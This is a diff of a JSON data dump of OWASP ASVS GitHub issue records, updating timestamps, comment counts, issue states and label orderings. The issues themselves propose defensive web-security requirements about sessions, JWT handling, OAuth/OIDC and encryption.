1453112600, "is_locked": false, "lock_reason": "", - "comments_count": 25, - "closed_at": null, + "comments_count": 28, + "closed_at": "2024-09-22T14:56:39Z", "created_at": "2022-11-17T10:38:36Z", - "updated_at": "2024-09-18T19:03:56Z", + "updated_at": "2024-09-22T14:56:58Z", "author": 800, "repository": 1166, "assignees": [ 795 ], "labels": [ + 300, + 298, 286, - 287, 293, - 300, 301, + 287, 302 ] } @@ -48721,11 +48724,11 @@ 795 ], "labels": [ - 286, - 287, 296, 312, - 316 + 316, + 286, + 287 ] } }, @@ -48791,10 +48794,10 @@ 799 ], "labels": [ - 286, - 287, + 312, 307, - 312 + 286, + 287 ] } }, @@ -48826,11 +48829,11 @@ 322 ], "labels": [ - 286, - 287, 300, 302, - 317 + 317, + 286, + 287 ] } }, @@ -48839,7 +48842,7 @@ "pk": 1610, "fields": { "nest_created_at": "2024-09-11T21:40:31.976Z", - "nest_updated_at": "2024-09-11T21:40:31.976Z", + "nest_updated_at": "2024-09-22T20:25:13.539Z", "node_id": "I_kwDOAYyWqM5aHLRU", "title": "Remove glossary section from V2 to App A", "body": "Hi,\r\n\r\nI wonder if we could move the glossary of terms in \"V2 Authentication\" to Appendix A.\r\nOne could read this more fluently: I guess noone expect a glossary in the middle of the\r\nstandard. Even it's the only chapter we do so.\r\n\r\nSee you\r\nJörg Brünner", @@ -48852,10 +48855,10 @@ "sequence_id": 1511830612, "is_locked": false, "lock_reason": "", - "comments_count": 2, + "comments_count": 5, "closed_at": null, "created_at": "2022-12-27T14:02:02Z", - "updated_at": "2023-09-21T14:20:59Z", + "updated_at": "2024-09-22T19:36:53Z", "author": 806, "repository": 1166, "assignees": [], @@ -48897,8 +48900,8 @@ 799 ], "labels": [ - 303, - 311 + 311, + 303 ] } }, @@ -48933,10 +48936,10 @@ 799 ], "labels": [ - 286, - 287, + 318, 293, - 318 + 286, + 287 ] } }, @@ -48971,10 +48974,10 @@ 799 ], "labels": [ - 286, - 287, + 296, 293, - 296 + 286, + 287 ] } }, @@ -49006,11 +49009,11 @@ 322 ], "labels": [ - 286, - 287, 293, 296, - 316 + 316, + 286, + 287 ] } }, @@ -49042,10 +49045,10 @@ 322 ], "labels": [ - 286, - 287, 296, - 314 + 314, + 286, + 287 ] } }, @@ -49054,7 +49057,7 @@ "pk": 1616, "fields": { "nest_created_at": "2024-09-11T21:40:51.701Z", - "nest_updated_at": "2024-09-18T19:11:01.663Z", + "nest_updated_at": "2024-09-20T17:40:16.058Z", "node_id": "I_kwDOAYyWqM5exDEy", "title": "5.3.6 enhancement", "body": "Suggest clarifying:\r\n\r\n5.3.6 | [MODIFIED] Verify that the application protects against JSON injection attacks. (C4) | ✓ | ✓ | ✓ | 75\r\n-- | -- | -- | -- | -- | --\r\n\r\nwith\r\n\r\n5.3.6 | [MODIFIED] Verify that the application protects against JSON injection attacks by sanitizing JSON before JSON parsing. (C4) | ✓ | ✓ | ✓ | 75\r\n-- | -- | -- | -- | -- | --", @@ -49070,7 +49073,7 @@ "comments_count": 18, "closed_at": null, "created_at": "2023-02-17T20:21:58Z", - "updated_at": "2024-09-18T18:39:36Z", + "updated_at": "2024-09-19T17:44:56Z", "author": 236, "repository": 1166, "assignees": [ @@ -49078,10 +49081,11 @@ 795 ], "labels": [ - 286, 295, 300, - 309 + 286, + 309, + 301 ] } }, @@ -49146,11 +49150,11 @@ "repository": 1166, "assignees": [], "labels": [ - 286, - 287, 293, + 319, 308, - 319 + 286, + 287 ] } }, @@ -49182,8 +49186,8 @@ "labels": [ 288, 289, - 295, - 320 + 320, + 295 ] } }, @@ -49216,9 +49220,9 @@ 795 ], "labels": [ - 286, 297, - 300 + 300, + 286 ] } }, @@ -49252,12 +49256,12 @@ 795 ], "labels": [ - 286, - 287, 290, 296, 302, - 307 + 307, + 286, + 287 ] } }, @@ -49320,9 +49324,9 @@ 236 ], "labels": [ + 308, 286, - 287, - 308 + 287 ] } }, @@ -49354,9 +49358,9 @@ 236 ], "labels": [ + 308, 286, - 287, - 308 + 287 ] } }, @@ -49388,11 +49392,11 @@ 236 ], "labels": [ - 286, - 287, + 321, 296, 314, - 321 + 286, + 287 ] } }, @@ -49424,9 +49428,9 @@ 315 ], "labels": [ - 286, + 300, 293, - 300 + 286 ] } }, @@ -49457,8 +49461,8 @@ "assignees": [], "labels": [ 286, - 287, - 309 + 309, + 287 ] } }, @@ -49490,8 +49494,8 @@ "labels": [ 288, 289, - 293, - 300 + 300, + 293 ] } }, @@ -49521,10 +49525,10 @@ "repository": 1166, "assignees": [], "labels": [ - 286, 289, - 295, - 300 + 300, + 286, + 295 ] } }, @@ -49533,7 +49537,7 @@ "pk": 1630, "fields": { "nest_created_at": "2024-09-11T21:41:30.392Z", - "nest_updated_at": "2024-09-16T21:05:45.194Z", + "nest_updated_at": "2024-09-22T18:28:47.377Z", "node_id": "I_kwDOAYyWqM5zzE1I", "title": "Proposal: Add Field-Level Encryption Standard for Sensitive Data in ASVS", "body": "Sensitive applications often store customer or user data that, in the wrong hands, can have profound implications for user privacy and security. While ASVS does touch upon data protection in storage and transit, the granularity of protection mechanisms at the database field/column level isn't explicitly addressed.\r\n\r\nA clear example of where this can be crucial is in environments where a database administrator (DBA) has full access to the database contents. Even if they're trusted personnel, it's a best practice to implement a principle of least privilege and reduce the risk of unintentional data exposure or leaks. Field-level encryption can ensure that sensitive data fields remain encrypted, rendering them unreadable to a DBA or any other unauthorized role, while still allowing them to manage the database. \r\n\r\nI propose the addition of a standard (or a set of standards) that highlights the importance and best practices for implementing field-level encryption in applications where sensitive data is stored.\r\n\r\n", @@ -49546,18 +49550,18 @@ "sequence_id": 1942768968, "is_locked": false, "lock_reason": "", - "comments_count": 14, + "comments_count": 16, "closed_at": null, "created_at": "2023-10-13T23:15:50Z", - "updated_at": "2024-09-15T17:59:48Z", + "updated_at": "2024-09-22T16:32:13Z", "author": 434, "repository": 1166, "assignees": [ 434 ], "labels": [ + 1122, 286, - 287, 321 ] } @@ -49592,9 +49596,9 @@ 795 ], "labels": [ - 293, 297, 300, + 293, 303 ] } @@ -49659,10 +49663,10 @@ "repository": 1166, "assignees": [], "labels": [ - 286, - 287, + 308, 293, - 308 + 286, + 287 ] } }, @@ -49692,9 +49696,9 @@ "repository": 1166, "assignees": [], "labels": [ + 302, 286, - 287, - 302 + 287 ] } }, @@ -49724,10 +49728,10 @@ "repository": 1166, "assignees": [], "labels": [ - 303, - 308, 315, - 317 + 308, + 317, + 303 ] } }, @@ -49759,10 +49763,10 @@ 795 ], "labels": [ - 286, + 302, 290, 300, - 302 + 286 ] } }, @@ -49794,9 +49798,9 @@ 322 ], "labels": [ - 286, - 298, 300, + 298, + 286, 321 ] } @@ -49806,7 +49810,7 @@ "pk": 1638, "fields": { "nest_created_at": "2024-09-11T21:41:51.708Z", - "nest_updated_at": "2024-09-11T21:41:51.708Z", + "nest_updated_at": "2024-09-22T06:42:24.597Z", "node_id": "I_kwDOAYyWqM53fK89", "title": "Discourage the use of Stateless Sessions (and therefor the usage of JWT for session)", "body": "I want to propose two changes/additions in chapter 3 about Session Management:\r\n\r\n1. Add a section about Stateless Sessions\r\nPersonally I'm not so happy about the term Stateless Session as I (personally) think a session is always stateful, but it seems most of the internet uses this term to indicate an architecture where the server relies on the client keeping track of the session.\r\nHaving that defined, the dangers of these stateless sessions should be pointed out. This list might not be exhaustive, but for example:\r\n* When the server is not aware of the state, it's impossible to properly invalidate a session. If an attacker manages to compromise a session and gets hold of the token then the victim would never be able to 'log out', because the server relies on what the client sends. Also note that if a pentest is conducted, this will (should) also be flagged and marked as an issue.\r\n* Architectures where the client needs to keep track of the session often lead to developers storing the session in insecure ways. For example in session storage or cookies without the http flag, where javascript can also access them (which is dangerous from an xss perspective for example)\r\n* It's an architecture that makes it difficult to deal with session timeouts. In practice you often see that as a result, the session is very long-lived - often too long. When the duration is made shorter, it will require code on the server-side to generate replacement tokens with a new validity, which is complex.\r\n\r\nIn short: to overcome the drawbacks of Stateless Sessions, you would have to implement a lot of logic on the server-side and ultimately even add state (in order to know if a token was made invalid). This means the advantage of having a stateless session has been nullified and in return you have a lot of extra complexity where things can go wrong.\r\nA good security practice states that you shouldn't try implementing your own sessions, but better to rely on proven techniques. Building your own (stateful) stateless session goes against that.\r\nTherefor, stateless sessions should be avoided.\r\n\r\n2. In section 3.5 (Token-based Session Management), refer to the section about Stateless Sessions to point out that using JWT for sessions suffers from all the drawbacks mentioned there and is therefor discouraged", @@ -49819,10 +49823,10 @@ "sequence_id": 2004660029, "is_locked": false, "lock_reason": "", - "comments_count": 10, + "comments_count": 12, "closed_at": null, "created_at": "2023-11-21T16:11:09Z", - "updated_at": "2024-05-02T10:43:19Z", + "updated_at": "2024-09-21T16:35:17Z", "author": 810, "repository": 1166, "assignees": [ @@ -49862,8 +49866,8 @@ "repository": 1166, "assignees": [], "labels": [ - 293, 300, + 293, 303 ] } @@ -49932,9 +49936,9 @@ ], "labels": [ 286, - 297, 301, - 313 + 313, + 297 ] } }, @@ -49966,9 +49970,9 @@ 322 ], "labels": [ + 308, 286, - 287, - 308 + 287 ] } }, @@ -50000,10 +50004,10 @@ 236 ], "labels": [ - 286, - 287, + 308, 295, - 308 + 286, + 287 ] } }, @@ -50036,9 +50040,9 @@ 236 ], "labels": [ + 308, 286, - 287, - 308 + 287 ] } }, @@ -50047,7 +50051,7 @@ "pk": 1645, "fields": { "nest_created_at": "2024-09-11T21:42:10.456Z", - "nest_updated_at": "2024-09-11T21:42:10.456Z", + "nest_updated_at": "2024-09-22T18:28:49.419Z", "node_id": "I_kwDOAYyWqM58W7WY", "title": "Add requirement about usage of claims other than subject and issuer as an identifier for OpenID Connect", "body": "Usage of claims other than the subject and issuer identifier to uniquely identify an end user in OpenID Connect is non-compliant with the [framework](https://openid.net/specs/openid-connect-core-1_0.html#ClaimStability). As per [a recent Microsoft report](https://msrc.microsoft.com/blog/2023/06/potential-risk-of-privilege-escalation-in-azure-ad-applications/), there is a false identifier anti-pattern being followed and [exploited in the wild](https://www.descope.com/blog/post/noauth) resulting in account takeover.\r\n\r\nTo keep it simple, the sub (subject) and iss (issuer) claims, when used together, are considered to be a unique primary identifier for OIDC, as the uniqueness across users is guaranteed. Other claims such as email, username or phone number should not be used, as they can change over time and an attacker can falsify these claims.\r\n\r\nI'm interested in contributing and happy to create a PR for this, as well as adding other OIDC requirements. Perhaps this is something I can help with as part of the OAuth2 changes being [discussed here ](https://github.com/OWASP/ASVS/issues/996)?", @@ -50063,20 +50067,19 @@ "comments_count": 24, "closed_at": null, "created_at": "2024-01-17T15:03:37Z", - "updated_at": "2024-08-10T17:00:25Z", + "updated_at": "2024-09-22T17:11:04Z", "author": 589, "repository": 1166, "assignees": [ - 795, 314, 315, + 795, 589 ], "labels": [ - 286, - 299, 300, - 317 + 286, + 299 ] } }, @@ -50109,9 +50112,9 @@ ], "labels": [ 288, + 322, 292, - 300, - 322 + 300 ] } }, @@ -50144,9 +50147,9 @@ 322 ], "labels": [ + 300, 286, 287, - 300, 308 ] } @@ -50156,7 +50159,7 @@ "pk": 1648, "fields": { "nest_created_at": "2024-09-11T21:42:20.786Z", - "nest_updated_at": "2024-09-18T19:11:04.336Z", + "nest_updated_at": "2024-09-22T18:28:52.351Z", "node_id": "I_kwDOAYyWqM5-qbD4", "title": "client should not send longer request headers than server can accept", "body": "\r\n\r\nspin-off from https://github.com/OWASP/ASVS/issues/1739#issuecomment-1816882008\r\n\r\nProblem to solve: if a user controls input that is sent to the server via request header (token) value, it must be validated or sanitized to not be longer than the \"max header field size\" allowed by server configuration, usually it is 8kB.\r\n\r\nClassical functionality: cookies, authorization headers (including access_token JWT's)\r\n\r\nIf an attacker controls the value and can set it to the client browser, this client will have error 413 or 400 as a response for each request and can not use the service.", @@ -50169,20 +50172,21 @@ "sequence_id": 2125050104, "is_locked": false, "lock_reason": "", - "comments_count": 16, + "comments_count": 21, "closed_at": null, "created_at": "2024-02-08T12:16:51Z", - "updated_at": "2024-09-18T18:57:17Z", + "updated_at": "2024-09-22T17:27:23Z", "author": 795, "repository": 1166, "assignees": [ 795 ], "labels": [ - 286, + 1122, 300, - 301, - 309 + 286, + 309, + 301 ] } }, @@ -50214,8 +50218,8 @@ 811 ], "labels": [ - 303, - 320 + 320, + 303 ] } }, @@ -50311,10 +50315,10 @@ 795 ], "labels": [ - 286, - 293, + 318, 316, - 318 + 293, + 286 ] } }, @@ -50323,31 +50327,31 @@ "pk": 1653, "fields": { "nest_created_at": "2024-09-11T21:42:32.386Z", - "nest_updated_at": "2024-09-18T19:11:06.718Z", + "nest_updated_at": "2024-09-22T18:28:55.056Z", "node_id": "I_kwDOAYyWqM6Dnkiw", "title": "encoded sensitive data (such as JWT) should not be logged", "body": "access_token (also id_token) JWT may contain relatively sensitive information, such as person's full name, SSN, email, phone, address, etc.\r\n\r\nAt the same time, those are sent via URL parameters - that means JWT content is logged everywhere to access logs, browser history etc.\r\n\r\nIf we could put all this information as plain text to URL parameters, everyone would understand, it's nonsense to send information like a person's full name, SSN, email, phone, and address as URL parameters. If it is inside JWT, it's the same, just base64 encoded.\r\n\r\nI know, there is OAuth `response_mode=query`, and I know there is OIDC logout `id_token_hint` - this is actually one reason to address this problem. The problem exists for both when the browser communicates directly with the authorization server or IdP.\r\n\r\nAt the moment we have requirements:\r\n\r\n| # | Description | L1 | L2 | L3 | CWE |\r\n| :---: | :--- | :---: | :---: | :---: | :---: |\r\n| **7.1.1** | Verify that the application does not log credentials or payment details. Session tokens should only be stored in logs in an irreversible, hashed form. | ✓ | ✓ | ✓ | 532 |\r\n| **8.2.2** | [MODIFIED, MERGED FROM 3.2.3] Verify that data stored in browser storage (such as localStorage, sessionStorage, IndexedDB, or cookies) does not contain sensitive data, with the exception of session tokens which should be stored in either cookies or sessionStorage. | ✓ | ✓ | ✓ | 922 |\r\n| **8.3.1** | [MODIFIED, MERGED FROM 3.1.1, 13.1.3] Verify that sensitive data is only sent to the server in the HTTP message body or headers and that the URL and query string do not contain sensitive information, such as an API key or session token. | ✓ | ✓ | ✓ | 598 |\r\n\r\nBased on 8.3.1 - JWT, containing data about the user, must not sent in a URL parameter anyway.\r\n\r\n7.1.1 and 8.2.2, as access_token is not a session token (although massively used as such), I recommend putting special spotlight on JWT (or abstractly \"encoded data, such as in JWT\") and mentioning them in 7.1.1 and 8.2.2\r\n\r\nVisualized:
\r\n![sensitive_information](https://github.com/OWASP/ASVS/assets/47597707/d75a2b16-058c-4384-b215-15f6b7a23a54)\r\n", "summary": "Prevent logging of sensitive data like JWTs, as they can contain personal information such as names, SSNs, and emails. Ensure that access tokens are not sent via URL parameters to mitigate exposure in logs and browser history, adhering to requirements that restrict sensitive data to HTTP message bodies or headers. Focus on explicitly addressing JWTs in security guidelines to enhance data protection measures.", "hint": "To address the problem of securely handling JWTs (JSON Web Tokens) and ensuring sensitive data is not logged or exposed in URL parameters, you can take the following steps:\n\n1. **Review Current Logging Practices**: Assess the current logging mechanisms to identify where sensitive data, including JWTs, might be logged. Ensure that logs do not capture sensitive information.\n\n2. **Implement JWT Best Practices**: Follow JWT best practices by avoiding sensitive data in the payload. Limit the information contained in JWTs to what is strictly necessary for authentication and authorization purposes.\n\n3. **Use HTTP Message Body**: Ensure that sensitive information (like access tokens) is sent in the HTTP message body rather than in URL parameters. This reduces the risk of logging and exposure through browser history.\n\n4. **Modify Authorization Flow**: If using OAuth, consider changing the `response_mode=query` to `response_mode=form_post` where possible. This helps keep sensitive tokens out of the URL.\n\n5. **Educate Developers**: Provide training for developers on the risks associated with logging sensitive data and the importance of secure handling of JWTs. Ensure they understand the implications of including sensitive information in URLs.\n\n6. **Implement Token Expiry and Revocation**: Use short-lived access tokens and implement a revocation mechanism to minimize the impact of any leaked tokens. This can also help in managing session tokens more securely.\n\n7. **Use Secure Cookies for Tokens**: Store access tokens in secure, HttpOnly cookies instead of local storage or session storage. This mitigates the risk of XSS attacks that can read tokens from local storage.\n\n8. **Regular Security Audits**: Conduct regular security audits and penetration testing to identify potential vulnerabilities related to JWT handling and logging practices. Evaluate compliance with established security requirements.\n\n9. **Update Security Policies**: Revise security policies to explicitly prohibit logging sensitive information, including JWTs. Make sure these policies are enforced across all development and operational teams.\n\n10. **Monitor and Alert**: Implement monitoring and alerting mechanisms to detect any unauthorized access attempts or logging of sensitive information. This helps in proactive identification of potential security breaches.\n\nBy following these steps, you can significantly reduce the risks associated with logging sensitive information in JWTs and ensure compliance with established security requirements.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/1919", "number": 1919, "sequence_id": 2208188592, "is_locked": false, "lock_reason": "", - "comments_count": 16, - "closed_at": null, + "comments_count": 19, + "closed_at": "2024-09-22T16:32:30Z", "created_at": "2024-03-26T13:03:49Z", - "updated_at": "2024-09-18T18:56:18Z", + "updated_at": "2024-09-22T16:32:30Z", "author": 795, "repository": 1166, "assignees": [ 795 ], "labels": [ + 1122, 286, - 300, 321 ] } @@ -50357,23 +50361,23 @@ "pk": 1654, "fields": { "nest_created_at": "2024-09-11T21:42:34.852Z", - "nest_updated_at": "2024-09-18T18:20:58.261Z", + "nest_updated_at": "2024-09-19T06:48:57.904Z", "node_id": "I_kwDOAYyWqM6FriRG", "title": "V51 OAuth: Consider narrowing or expanding the scope for the OAuth2 chapter", "body": "A suggestion is to define the scope for the [V51 OAuth](https://github.com/OWASP/ASVS/blob/master/5.0/en/0x51-V51-OAuth2.md) chapter more clearly. Either to make it more general and include OIDC or be more specific, excluding OIDC and all OAuth2 flows except the Code flow.\r\n\r\nIf the scope for ASVS should only be OAuth2 Code (the other OAuth2 flows from 6749 are not mentioned in the verifications), then it would be good to make that clear as well. Perhaps then change the title to \"OAuth 2.0 Code flow\" and remove the OIDC details from verifications? Or is the intention to include OIDC (or just OIDC Code flow)? Then it would be good if the title and first sections reflected that, and also have reference links to OIDC specs. The downside of including OIDC is of course a bigger scope to maintain...\r\n\r\nTo me, the current title and first sections in the chapter implies that verifications will only address OAuth 2.0, perhaps all flows in RFC 6749? OIDC is mentioned, referred to as a \"a simple identity layer on top of the OAuth 2.0 protocol\", which implies OIDC is probably going to be out of scope? But then, verification 51.1.2 and 51.2.2 refers to OIDC (nonce and id-token,) which is a little surprising given the title, the text in the first sections, and that there are no references to OIDC specs.\r\n\r\nAnother scope feedback: Given that the \"resource\" and \"authorization_details\" parameters are mentioned, this implies that the RFCs https://www.rfc-editor.org/rfc/rfc8707 and https://www.rfc-editor.org/rfc/rfc9396 are included in the scope? Is the intention to include more additional specs from https://oauth.net/specs/ in the scope? Like PAR etc.\r\n\r\nIt is not easy to decide on a good balance, level of detail, and so on. Either way, it would be good with a more clearly defined scope and discussion about it. Then, I my opinion, it will be easier to add feedback on specific verifications that can be added or removed, to reflect the flows in scope.\r\n", "summary": "Clarify the scope of the V51 OAuth chapter by either expanding it to include OIDC or narrowing it to focus solely on OAuth2 Code flow. If the intent is to limit the scope to OAuth2 Code, update the title and remove OIDC references; if including OIDC, ensure the title and sections reflect this and provide links to relevant specs. Define the inclusion of parameters like \"resource\" and \"authorization_details\" explicitly to determine if additional RFCs will be considered, ultimately leading to clearer specifications and easier feedback on verifications.", "hint": "Approaching the problem of defining the scope for the V51 OAuth chapter can be done systematically. Here are ten recommended steps:\n\n1. **Review Current Scope**: Analyze the existing content of the V51 OAuth chapter to understand its current scope, including which OAuth2 flows and specifications are mentioned.\n\n2. **Identify Stakeholders**: Gather feedback from key stakeholders, including contributors, users of the ASVS, and experts in OAuth and OIDC. This will provide insights into their needs and expectations.\n\n3. **Define Objectives**: Clearly outline the objectives for narrowing or expanding the scope. Consider whether the goal is to improve clarity, enhance usability, or maintain comprehensiveness.\n\n4. **Evaluate OAuth2 Flows**: Assess the relevance of each OAuth2 flow as defined in RFC 6749 to the ASVS. Determine whether all flows should be included or if a focus on the Code flow is more appropriate.\n\n5. **Consider OIDC Integration**: Discuss the implications of including OpenID Connect (OIDC) within the chapter. Evaluate the benefits and challenges of incorporating OIDC alongside OAuth2.\n\n6. **Draft Revised Scope**: Create a draft version of the revised scope based on the findings from the previous steps. This draft should highlight whether the chapter will cover only OAuth2, include OIDC, or focus solely on the OAuth2 Code flow.\n\n7. **Solicit Feedback**: Share the draft scope with stakeholders for feedback. Encourage open discussion on the clarity and appropriateness of the proposed scope.\n\n8. **Analyze Feedback**: Collect and analyze the feedback received. Identify common themes or concerns that may need to be addressed in the final scope.\n\n9. **Finalize Scope**: Based on the feedback, refine and finalize the scope of the V51 OAuth chapter. Ensure that it clearly communicates what is included and excluded.\n\n10. **Update Documentation**: Revise the chapter title, introductory sections, and verifications as needed to reflect the finalized scope. Provide references to relevant specifications, ensuring that the documentation is clear and useful for users.\n\nFollowing these steps should help in achieving a well-defined and clear scope for the V51 OAuth chapter, making it easier for users to understand its contents and applicability.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/1924", "number": 1924, "sequence_id": 2242782278, "is_locked": false, "lock_reason": "", - "comments_count": 13, - "closed_at": null, + "comments_count": 14, + "closed_at": "2024-09-19T05:11:30Z", "created_at": "2024-04-15T06:04:52Z", - "updated_at": "2024-09-18T06:08:55Z", + "updated_at": "2024-09-19T05:11:30Z", "author": 813, "repository": 1166, "assignees": [ @@ -50382,11 +50386,11 @@ 795 ], "labels": [ - 286, 295, - 299, 300, - 1121 + 286, + 1121, + 299 ] } }, @@ -50419,10 +50423,10 @@ 813 ], "labels": [ - 286, - 295, 299, - 300 + 300, + 286, + 295 ] } }, @@ -50456,9 +50460,9 @@ 795 ], "labels": [ + 294, 286, - 287, - 294 + 287 ] } }, @@ -50490,9 +50494,9 @@ 236 ], "labels": [ + 308, 286, - 287, - 308 + 287 ] } }, @@ -50501,33 +50505,33 @@ "pk": 1658, "fields": { "nest_created_at": "2024-09-11T21:42:47.083Z", - "nest_updated_at": "2024-09-11T21:42:47.083Z", + "nest_updated_at": "2024-09-22T18:28:57.121Z", "node_id": "I_kwDOAYyWqM6H2PJ6", "title": "Italian Translation", "body": "Hi everyone, I'm translating the OWASP ASVS into Italian\r\n\r\nI don't think anyone has started the translation yet", "summary": "Translate the OWASP ASVS into Italian, as it appears that no one has begun this task yet. Ensure that the translation maintains the technical accuracy and terminology of the original document. Share updates on progress to keep the community informed.", "hint": "Here are possible steps to approach the translation of the OWASP ASVS into Italian:\n\n1. **Gather Resources**: Collect all relevant documentation and materials related to the OWASP ASVS, including the original English version and any existing Italian resources.\n\n2. **Create a Translation Plan**: Outline the scope of the translation project, including timelines, milestones, and any specific sections that may require special attention.\n\n3. **Assemble a Team**: If possible, recruit other translators or native Italian speakers with experience in cybersecurity to assist with the translation.\n\n4. **Familiarize with Terminology**: Review cybersecurity terminology in both English and Italian to ensure consistent and accurate translations throughout the document.\n\n5. **Start Translating**: Begin translating the ASVS section by section, making sure to maintain the original meaning and context.\n\n6. **Use Translation Tools**: Utilize translation software or tools to help with consistency and efficiency, but ensure to proofread and edit the automated translations.\n\n7. **Review and Edit**: After completing the initial translation, review the document for clarity, consistency, and accuracy. Make necessary edits.\n\n8. **Seek Feedback**: Share the translated document with other Italian-speaking professionals in the cybersecurity field for feedback and suggestions.\n\n9. **Finalize the Translation**: Incorporate feedback and finalize the translation, ensuring that all sections are complete and properly formatted.\n\n10. **Publish and Share**: Publish the translated OWASP ASVS on relevant platforms and share it with the community to promote its use among Italian-speaking audiences.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/1951", "number": 1951, "sequence_id": 2279142010, "is_locked": false, "lock_reason": "", - "comments_count": 1, - "closed_at": null, + "comments_count": 2, + "closed_at": "2024-09-22T17:13:53Z", "created_at": "2024-05-04T18:13:47Z", - "updated_at": "2024-05-05T16:50:10Z", + "updated_at": "2024-09-22T17:13:53Z", "author": 814, "repository": 1166, "assignees": [ - 795, - 814 + 814, + 795 ], "labels": [ - 288, 292, - 305 + 305, + 288 ] } }, @@ -50559,9 +50563,9 @@ 795 ], "labels": [ - 286, 297, - 300 + 300, + 286 ] } }, @@ -50594,9 +50598,9 @@ 315 ], "labels": [ - 286, 299, - 300 + 300, + 286 ] } }, @@ -50628,10 +50632,10 @@ 795 ], "labels": [ - 286, - 295, 299, - 300 + 300, + 286, + 295 ] } }, @@ -50666,10 +50670,10 @@ 795 ], "labels": [ - 286, + 300, 298, - 299, - 300 + 286, + 299 ] } }, @@ -50678,34 +50682,34 @@ "pk": 1663, "fields": { "nest_created_at": "2024-09-11T21:43:02.458Z", - "nest_updated_at": "2024-09-11T21:43:02.458Z", + "nest_updated_at": "2024-09-20T17:40:21.339Z", "node_id": "I_kwDOAYyWqM6JX8Wt", "title": "discussion: OAuth - using OAuth just for authentication", "body": "spin-off from https://github.com/OWASP/ASVS/issues/1916 \"Discussion/Proposal 4\"\r\n\r\nThere is a clear trend of overengineering using OAuth. One of them is using OAuth only for providing authentication. In this case, directly OIDC should be used without OAuth overhead.\r\n\r\nAlso addressed here: https://datatracker.ietf.org/doc/html/draft-ietf-oauth-browser-based-apps#section-7.1\r\n\r\nThe question is - should we watch it only as unnecessary overengineering, or as a security problem to open up a new set of attack vectors.\r\n\r\n--\r\nFeedback from @tghosth in https://github.com/OWASP/ASVS/issues/1916#issuecomment-2024985876\r\n\r\n> I agree this is an important idea but the idea needs to be actionable", "summary": "Evaluate the trend of using OAuth solely for authentication, recognizing that this practice introduces unnecessary complexity when OpenID Connect (OIDC) could suffice. Consider whether this overengineering poses significant security risks by potentially creating new attack vectors. Focus on identifying actionable solutions to streamline authentication processes without compromising security.", "hint": "1. **Define the Scope**: Clearly outline the context in which OAuth is being misused for authentication instead of using OIDC. Identify the specific scenarios where this overengineering occurs.\n\n2. **Research Existing Standards**: Review the documentation and standards for OAuth and OpenID Connect (OIDC) to understand their intended use cases and differences. Focus on sections relevant to authentication.\n\n3. **Analyze Security Implications**: Investigate the security risks introduced by using OAuth for authentication. Identify potential attack vectors that could arise from this misuse, such as token interception, replay attacks, or improper session management.\n\n4. **Gather Community Input**: Engage with security experts and the developer community, including discussions on platforms like GitHub, to gather insights and experiences related to using OAuth incorrectly. \n\n5. **Develop Actionable Guidelines**: Create clear, actionable guidelines or best practices that can help developers avoid using OAuth for authentication inappropriately. Include recommendations for when to use OIDC instead.\n\n6. **Create Awareness Campaign**: Develop a campaign to raise awareness about the issue within the developer community. This could involve blog posts, webinars, or conference talks explaining the differences and best practices.\n\n7. **Draft a Security Advisory**: Prepare a formal security advisory that outlines the risks associated with misusing OAuth for authentication, aimed at organizations and developers who may be using OAuth inappropriately.\n\n8. **Propose Enhancements to Standards**: If necessary, propose enhancements or clarifications to the OAuth and OIDC specifications to prevent misuse and improve understanding within the community.\n\n9. **Monitor Adoption and Implementation**: After disseminating guidelines and raising awareness, monitor how these practices are adopted in the industry. Use feedback to refine recommendations.\n\n10. **Review and Iterate**: Continuously review the guidelines and community feedback, and iterate on the recommendations to ensure they remain relevant as technology and threats evolve.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/1966", "number": 1966, "sequence_id": 2304755117, "is_locked": false, "lock_reason": "", - "comments_count": 7, - "closed_at": null, + "comments_count": 8, + "closed_at": "2024-09-20T10:14:41Z", "created_at": "2024-05-19T19:45:35Z", - "updated_at": "2024-07-25T20:45:31Z", + "updated_at": "2024-09-20T10:14:42Z", "author": 795, "repository": 1166, "assignees": [ - 795, - 315 + 315, + 795 ], "labels": [ + 300, 286, 289, - 299, - 300 + 299 ] } }, @@ -50738,9 +50742,9 @@ 795 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -50773,9 +50777,9 @@ 315 ], "labels": [ - 286, 299, - 300 + 300, + 286 ] } }, @@ -50784,7 +50788,7 @@ "pk": 1666, "fields": { "nest_created_at": "2024-09-11T21:43:12.186Z", - "nest_updated_at": "2024-09-11T21:43:12.186Z", + "nest_updated_at": "2024-09-20T17:40:24.119Z", "node_id": "I_kwDOAYyWqM6JpWDq", "title": "V51: Additional OAuth/OIDC proposals", "body": "@elarlang and team I'll begin with a few proposals of my own here to start the discussion about them (more to come). I'll try not to duplicate the ones already mentioned here https://github.com/OWASP/ASVS/issues/1925.\r\n\r\n1. Verify that the Implicit Flow grant is not used or configured by the Authorization Server, as it is vulnerable to access token leakage and access token replay attacks. \r\n - This applies to both OAuth and OIDC. As per https://oauth.net/2/grant-types and https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics#name-implicit-grant. If preferred we can consolidate this with `51.1.6` about Resource Owner Password Credentials Grant, but it might make sense to make it a separate requirement to keep it granular, because these grants are vulnerable to different attacks that we are highlighting.\r\n2. Verify that the unique identifier in the ID token for an end-user is a combination of the sub claim and the iss claim. Avoid usage of other claims such as email, phone_number, preferred_username, or name, as they may be mutable and can be potentially falsified.\r\n - This is specific to OIDC and goes back to issues such as the vulnerability reported from Microsoft that I mentioned in my other issue here: https://github.com/OWASP/ASVS/issues/1826\r\n - @jmanico also touches on this in https://github.com/OWASP/ASVS/issues/996#issuecomment-2003085972 for the ** Prevent Authorization Server Mix-Up Attacks:* comment\r\n3. Verify that the authorization server compares redirect URIs using exact string matching.\r\n - This applies to both OAuth and OIDC. Using anything other than exact string matching, such as substrings, patterns etc opens up the door to open redirects. See here: https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics#name-insufficient-redirect-uri-v.\r\n - I see this was mentioned here: https://github.com/OWASP/ASVS/issues/1965, and perhaps this can be the verification requirement for it\r\n4. Verify that the nonce parameter sent in the authorization request is included in the nonce claim of the issued ID token, and that the client ensures that the nonce claim value is equal to the original value sent in the authorization 